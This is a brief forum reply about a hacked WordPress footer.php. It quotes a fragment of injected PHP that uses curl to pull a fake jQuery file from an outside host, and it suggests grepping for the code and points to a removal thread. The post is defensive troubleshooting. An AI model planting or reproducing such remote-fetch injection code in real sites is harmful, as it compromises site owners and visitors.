Reply To: Hacked WordPress footer.php

[Shikkediel]

I found more results after googling some of the code :

if ( function_exists('curl_init') ) { $url="http://javaterm1.pw/java/jquery-1.6.3.min.js";

Seems to be troublesome and well hidden but it’s must be in a plugin somewhere. If you have shell access, you might be able to grep the script.

Edit – above search term updated.

Someone here was able to remove it :

Link